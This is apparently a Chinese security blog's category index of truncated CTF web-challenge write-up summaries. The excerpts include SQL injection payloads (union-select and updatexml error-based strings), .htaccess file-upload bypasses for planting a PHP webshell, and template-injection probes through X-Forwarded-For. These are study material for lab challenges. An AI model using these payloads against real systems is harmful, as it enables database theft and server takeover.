随笔分类 - 网安
摘要:HTTP请求基本格式 HTTP请求的基本格式包括请求行、请求头、空行和请求正文。常用的HTTP请求方法有GET、POST、PUT、DELETE等,常见的HTTP请求头域包括Host、User-Agent、Accept等。 基本格式: 请求行:由方法(如GET、POST)、URL(统一资源标识符)、H
阅读全文
摘要:[BJDCTF2020]The mystery of ip 参考:PHP的模板注入(Smarty模板) 相似例题:[CISCN2019 华东南赛区]Web11 Step 根据提示,尝试伪造ip X-Forwarded-For:1 发现回显也是1 所以可能是模板注入,尝试X-Forwarded-For
阅读全文
摘要:[GXYCTF2019]BabyUpload Step .htaccess文件辅助jpg文件上传,用蚁剑链接webshell .htaccess,记得bp修改上传类型: SetHandler application/x-httpd-php shell.jpg GIF89a <script langu
阅读全文
摘要:[MRCTF2020]你传你🐎呢 和.user.ini那道题有异曲同工之处,[SUCTF 2019]CheckIn 提前上传一个.htaccess文件,注意上传的时候要把Content-Type改为image/jpeg才能绕过成功上传。 SetHandler application/x-httpd
阅读全文
摘要:[BSidesCF 2020]Had a bad day 参考:文件包含漏洞 Step 点一下按钮,发现URL发生改变: url/index.php?category=woofers 修改尝试发现回显: Sorry, we currently only support woofers and m
阅读全文
摘要:[网鼎杯 2018]Fakebook Step 注册用户进入发现查看用户详情: /view.php?no=1 尝试修改为2 发现报错,可能是文件包含或者SQL注入 于是尝试改成: /view.php?no=2' 回显: [*] query error! (You have an error in y
阅读全文
摘要:[RoarCTF 2019]Easy Java Step 1 点击help按钮后发现: URL变成: url/Download?filename=help.docx 而回显: java.io.FileNotFoundException:{help.docx} 而当我尝试尝试POST,发现文件成功下载
阅读全文
摘要:[GYCTF2020]Blacklist Step 1 输入1,回显: array(2) { [0]=> string(1) "1" [1]=> string(7) "hahahah" } 稍微尝试注入: /?inject=1'+union+select+1,2,3;# 回显: return pre
阅读全文
摘要:[GXYCTF2019]BabySQli 非常神奇的一道题,漏洞利用点在于 联合查询时如果数据不存在,则会创建一个临时虚拟用户 于是当前尝试username=admin,返回wrong pass则该用户名存在 所以 username: 1'union select 1,'admin','202cb9
阅读全文
摘要:[SUCTF 2019]CheckIn Step 发现上传文件试验后, Your dir uploads/40faad96d40fbac7603474024cbb933a Your files : array(5) { [0]=> string(1) "." [1]=> string(2) ".."
阅读全文
摘要:[极客大挑战 2019]HardSQL Step 尝试 报错注入 库名 'or(updatexml(1,concat(0x7e,database()),0x7e))# 表名 'or(updatexml(1,concat(0x7e,(select(table_name)from(information
阅读全文
摘要:[网鼎杯 2020 青龙组]AreUSerialz 源代码蛮多的,但是题目没有那么复杂 题目 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected file
阅读全文
摘要:[ZJCTF 2019]NiZhuanSiWei Step 1 开靶机,获得php源码 <?php _GET["text"]; _GET["file"]; _GET["password"]; if(isset($text)&&(file_
阅读全文
摘要:[护网杯 2018]easy_tornado Step 靶机页面 /flag.txt /welcome.txt /hints.txt 其中: /flag.txt flag in /fllllllllllllag /hints.txt md5(cookie_secret+md5(filename))
阅读全文
摘要:[第一章 web入门]SQL注入-1 payload /index.php?id=1' and 0 union select 1,2,group_concat(fllllag) from fl4g --+ ?id=-1' union select 1,2,group_concat(fllllag)
阅读全文
摘要:[第一章 web入门]常见的搜集 Step 1 /robots.txt 得到: User-agent: * Disallow: /flag1_is_her3_fun.txt Step 2 gedit 缓存文件 /index.php~ Step 3 vim缓存文件 .index.php.swp
阅读全文
摘要:[极客大挑战 2019]BuyFlag 源代码的提示 <!-- ~~~post money and password~~~ if (isset($_POST['password'])) { _POST['password']; if (is_numeric($passwor
阅读全文
摘要:搬运 搬运一下我自己以前的博客,方便好找 PHP入门 | Bolerat php实现文件上传与数据库交互 | Bolerat SQL基础操作 | Bolerat SQL注入漏洞 | Bolerat 模板注入 | Bolerat CTF PWN打基础(寄存器) | Bolerat
阅读全文
摘要:[BJDCTF2020]Easy MD5 Step 1 看源代码没线索,用burp抓包看一下: 发现提示,发现输入的是password 要构造使password=’or‘1的形式使之形成永真的语句 md5($pass,true)应该就是将pass的值md5加密后成十六进制转换成字符 这时候276f7
阅读全文
摘要:[极客大挑战 2019]BabySQL 判断类型 SQL关键字绕过,这道题可以双写绕过。 username=1' or 1=1# password=1' or 1=1# 得到报错: You have an error in your SQL syntax; check the manual that
阅读全文